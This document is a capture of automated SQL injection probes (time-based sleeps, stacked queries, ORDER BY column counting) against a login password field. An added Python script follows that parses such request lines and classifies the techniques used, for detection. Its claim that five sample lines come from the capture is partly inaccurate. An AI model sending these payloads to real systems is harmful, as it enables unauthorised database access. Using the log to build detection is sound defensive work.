GET /login?username=abc&password=123);SELECT PG_SLEEP(5)-- HTTP/1.1 
GET /login?username=abc&password=123;SELECT PG_SLEEP(5)-- HTTP/1.1 
GET /login?username=abc&password=123');SELECT PG_SLEEP(5)-- HTTP/1.1 
GET /login?username=abc&password=123';SELECT PG_SLEEP(5)-- HTTP/1.1 
GET /login?username=abc&password=123);WAITFOR DELAY '0:0:5'-- HTTP/1.1 
GET /login?username=abc&password=123;WAITFOR DELAY '0:0:5'-- HTTP/1.1 
GET /login?username=abc&password=123');WAITFOR DELAY '0:0:5'-- HTTP/1.1 
GET /login?username=abc&password=123';WAITFOR DELAY '0:0:5'-- HTTP/1.1 
GET /login?username=abc&password=123);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(78)||CHR(107)||CHR(76),5) FROM DUAL-- HTTP/1.1 
GET /login?username=abc&password=123;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(78)||CHR(107)||CHR(76),5) FROM DUAL-- HTTP/1.1 
GET /login?username=abc&password=123');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(78)||CHR(107)||CHR(76),5) FROM DUAL-- HTTP/1.1 
GET /login?username=abc&password=123';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(78)||CHR(107)||CHR(76),5) FROM DUAL-- HTTP/1.1 
GET /login?username=abc&password=123) AND (SELECT 9433 FROM (SELECT(SLEEP(5)))UOBG) AND (5534=5534 HTTP/1.1 
GET /login?username=abc&password=123 AND (SELECT 9433 FROM (SELECT(SLEEP(5)))UOBG) HTTP/1.1 
GET /login?username=abc&password=123 AND (SELECT 9433 FROM (SELECT(SLEEP(5)))UOBG)-- wyKY HTTP/1.1 
GET /login?username=abc&password=123') AND (SELECT 9433 FROM (SELECT(SLEEP(5)))UOBG) AND ('doQl'='doQl HTTP/1.1 
GET /login?username=abc&password=123' AND (SELECT 9433 FROM (SELECT(SLEEP(5)))UOBG) AND 'IMvM'='IMvM HTTP/1.1 
GET /login?username=abc&password=123) AND 1515=(SELECT 1515 FROM PG_SLEEP(5)) AND (8248=8248 HTTP/1.1 
GET /login?username=abc&password=123 AND 1515=(SELECT 1515 FROM PG_SLEEP(5)) HTTP/1.1 
GET /login?username=abc&password=123 AND 1515=(SELECT 1515 FROM PG_SLEEP(5))-- PgeE HTTP/1.1 
GET /login?username=abc&password=123') AND 1515=(SELECT 1515 FROM PG_SLEEP(5)) AND ('OoDW'='OoDW HTTP/1.1 
GET /login?username=abc&password=123' AND 1515=(SELECT 1515 FROM PG_SLEEP(5)) AND 'Zqlk'='Zqlk HTTP/1.1 
GET /login?username=abc&password=123) WAITFOR DELAY '0:0:5' AND (6147=6147 HTTP/1.1 
GET /login?username=abc&password=123 WAITFOR DELAY '0:0:5' HTTP/1.1 
GET /login?username=abc&password=123 WAITFOR DELAY '0:0:5'-- hVmx HTTP/1.1 
GET /login?username=abc&password=123') WAITFOR DELAY '0:0:5' AND ('oDNw'='oDNw HTTP/1.1 
GET /login?username=abc&password=123' WAITFOR DELAY '0:0:5' AND 'tWTl'='tWTl HTTP/1.1 
GET /login?username=abc&password=123) AND 4878=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(70)||CHR(77)||CHR(108),5) AND (5787=5787 HTTP/1.1 
GET /login?username=abc&password=123 AND 4878=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(70)||CHR(77)||CHR(108),5) HTTP/1.1 
GET /login?username=abc&password=123 AND 4878=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(70)||CHR(77)||CHR(108),5)-- Djiq HTTP/1.1 
GET /login?username=abc&password=123') AND 4878=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(70)||CHR(77)||CHR(108),5) AND ('Lyac'='Lyac HTTP/1.1 
GET /login?username=abc&password=123' AND 4878=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(70)||CHR(77)||CHR(108),5) AND 'APIe'='APIe HTTP/1.1 
GET /login?username=abc&password=123) ORDER BY 1-- TMmJ HTTP/1.1 
GET /login?username=abc&password=123) ORDER BY 9030-- RTTw HTTP/1.1 
GET /login?username=abc&password=123 ORDER BY 1-- mDvA HTTP/1.1 
GET /login?username=abc&password=123 ORDER BY 1200-- eNbW HTTP/1.1 
GET /login?username=abc&password=123 ORDER BY 1-- sYTq HTTP/1.1 
GET /login?username=abc&password=123 ORDER BY 8916-- lILp HTTP/1.1 
GET /login?username=abc&password=123') ORDER BY 1-- AOfY HTTP/1.1 
GET /login?username=abc&password=123') ORDER BY 6451-- Hzva HTTP/1.1 
GET /login?username=abc&password=123' ORDER BY 1-- Pauy HTTP/1.1 
GET /login?username=abc&password=123' ORDER BY 9918-- mEOJ HTTP/1.1
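A capture like the one above is most useful to a defender as a sample for detection logic. The script below is an added example, not part of the original post or of sqlmap or Wireshark: it parses request lines in the same "METHOD /path?query HTTP/1.1" form, URL-decodes each parameter value separately, and classifies what sqlmap is probing for (boolean, error-based, time-based, stacked, ORDER BY column count, UNION) with a small regular-expression rule set. The sample lines are constructed for the example: five are copied from the capture above, two are benign requests. The rule set and function names are this example's own assumptions; a production detector would add more signatures and handle POST bodies as well.

```python
"""Classify sqlmap-style probes in decoded request lines. Added example,
not code from the original post; rules and sample input are constructed."""
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

# One regex per injection technique; a value may match several.
RULES = {
    "boolean":     re.compile(r"\bAND\s+\(?\s*'?\w+'?\s*=\s*'?\w+'?", re.I),
    "error-based": re.compile(r"\b(?:EXTRACTVALUE|UPDATEXML|XMLType)\s*\(|::text\b", re.I),
    "time-based":  re.compile(r"\b(?:SLEEP|PG_SLEEP|BENCHMARK)\s*\(|\bWAITFOR\s+DELAY\b"
                              r"|DBMS_PIPE\.RECEIVE_MESSAGE", re.I),
    "stacked":     re.compile(r";\s*(?:SELECT|WAITFOR|EXEC|INSERT|UPDATE|DELETE)\b", re.I),
    "order-by":    re.compile(r"\bORDER\s+BY\s+\d+", re.I),
    "union":       re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}

# The query part may contain spaces once decoded, so anchor on the trailing
# HTTP version rather than splitting on whitespace.
REQ_LINE = re.compile(r"^(\S+)\s+(.*?)\s+HTTP/\d\.\d\s*$")


def analyze_request_line(line: str) -> Optional[Dict]:
    """Parse one request line; return method, path, decoded parameters and,
    per parameter, the sorted list of techniques its value matched."""
    m = REQ_LINE.match(line)
    if not m:
        return None                       # not a request line (e.g. a header)
    method, target = m.group(1), m.group(2)
    path, _, query = target.partition("?")
    params: Dict[str, str] = {}
    for pair in (query.split("&") if query else []):
        key, _, value = pair.partition("=")   # split on the FIRST '=' only
        params[unquote(key)] = unquote(value) # unquote keeps '+' (T-SQL concat)
    hits = {}
    for name, value in params.items():
        techniques = sorted(t for t, rx in RULES.items() if rx.search(value))
        if techniques:
            hits[name] = techniques
    return {"method": method, "path": path, "params": params, "hits": hits}


def scan(lines: List[str]) -> Tuple[Counter, List[Dict]]:
    """Run every line through the rules; return per-technique counts and the
    flagged requests so the probed parameter can be seen."""
    counts: Counter = Counter()
    flagged = []
    for line in lines:
        result = analyze_request_line(line)
        if not result or not result["hits"]:
            continue
        flagged.append(result)
        for techniques in result["hits"].values():
            counts.update(techniques)
    return counts, flagged


# Constructed sample: five lines from the capture above plus two benign ones.
SAMPLE_LINES = [
    "GET /login?username=abc&password=123 HTTP/1.1",
    "GET /login?username=abc' AND 2247=4788 AND 'ddJs'='ddJs&password=123 HTTP/1.1",
    "GET /login?username=abc AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,"
    "(SELECT (ELT(9018=9018,1))),0x717a6b6a71))&password=123 HTTP/1.1",
    "GET /login?username=abc';SELECT PG_SLEEP(5)--&password=123 HTTP/1.1",
    "GET /login?username=abc&password=123 WAITFOR DELAY '0:0:5'-- hVmx HTTP/1.1",
    "GET /login?username=abc&password=123' ORDER BY 9918-- mEOJ HTTP/1.1",
    "GET /search?q=hello%20world HTTP/1.1",
]

if __name__ == "__main__":
    counts, flagged = scan(SAMPLE_LINES)
    for r in flagged:
        print(r["method"], r["path"], r["hits"])
    print(dict(counts))
```

On the sample the scan flags five of the seven lines; the mix of MySQL (EXTRACTVALUE), PostgreSQL (PG_SLEEP) and SQL Server (WAITFOR DELAY) payloads against the same two parameters is itself a strong fingerprint of automated fingerprinting rather than a human tester, and the per-parameter grouping shows which input the scanner is working on.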